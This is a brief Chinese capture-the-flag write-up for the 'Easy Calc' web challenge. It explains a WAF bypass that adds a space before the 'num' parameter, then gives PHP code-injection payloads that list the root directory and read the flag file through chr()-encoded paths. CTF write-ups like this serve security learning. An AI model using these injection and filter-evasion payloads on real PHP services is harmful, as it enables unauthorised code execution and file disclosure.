Easy Calc思路,打开一看,输入1+9点下计算也计算出来了,减法也可以,答案正确,没看出来什么 ,直接f12查看源码,发现一段注释 可能是waf绕过
接着我们继续寻找,发现了一段script代码,并且看到了一个calc.php
让我们访问下calc.php文件吧
如果给num的值为字母,则会报错,所以看了大佬的wp,在num变量前几个空格,这样一样,变量名就是" num"而不是"num",但是在php解析的时候,会把空格给去掉,这样跟我们想要的效果是一样的。还上传了非法字符。
我们calc.php? num=1;var_dump(scandir(chr(47)))
扫一下根目录,发现了flagg文件
接着我们就继续构造payload: %20num=var_dump(file_get_contents(chr(47).chr(102).chr(49).chr(97).chr(103).chr(103)))
然后得到 flag{8e6ba3ee-7920-4697-8cc9-a4e03b9c2032}